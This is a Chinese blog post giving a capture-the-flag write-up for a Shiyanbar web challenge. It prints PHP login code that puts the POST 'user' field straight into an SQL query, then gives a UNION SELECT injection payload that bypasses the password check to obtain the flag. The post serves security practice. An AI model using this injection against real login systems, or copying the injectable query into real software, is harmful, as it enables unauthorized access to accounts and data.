西普实验吧ctf-web-程序逻辑问题(代码审计)

骑猪看日落 2022-04-10 05:13 134阅读 0赞

**题目地址：**[http://ctf5.shiyanbar.com/web/5/index.php][http_ctf5.shiyanbar.com_web_5_index.php]

![20181227170429477.png][]

**查看页面源代码，发现index.txt隐藏文件**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70][]

** 又是一道代码审计的题目：**

if($_POST[user] && $_POST[pass]) {
    	$conn = mysql_connect("********, "*****", "********");
    	mysql_select_db("phpformysql") or die("Could not select database");
    	if ($conn->connect_error) {
    		die("Connection failed: " . mysql_error($conn));
    } 
    $user = $_POST[user];
    $pass = md5($_POST[pass]);
    
    $sql = "select pw from php where user='$user'";
    $query = mysql_query($sql);
    if (!$query) {
    	printf("Error: %s\n", mysql_error($conn));
    	exit();
    }
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
      
      if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
    	echo "<p>Logged in! Key:************** </p>";
    }
    else {
        echo("<p>Log in failure!</p>");
    	
      }
    }

**看完后，我们大概能得到两个结论：**

1.  要获取user的那一行数据。
2.  把user那一行数据的pw列，经过md5加密后，与提交的pass数据做比较，相等就输出flag。

**payload：**

http://ctf5.shiyanbar.com/web/5/index.php
    [POST]user=Username' union select md5(111)#&pass=111

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1][]

**这样就得到flag了。**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2][]

[http_ctf5.shiyanbar.com_web_5_index.php]: http://ctf5.shiyanbar.com/web/5/index.php
[20181227170429477.png]: /images/20220402/b0434d9a4bc947b496c7c1c3b054de35.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70]: /images/20220402/d3271464a53440ffb2435f150392cf7a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1]: /images/20220402/4bbec5814b4a4a00bb09875273cc92a7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2]: /images/20220402/8db47e1816cb4bf88c5a1668977331f8.png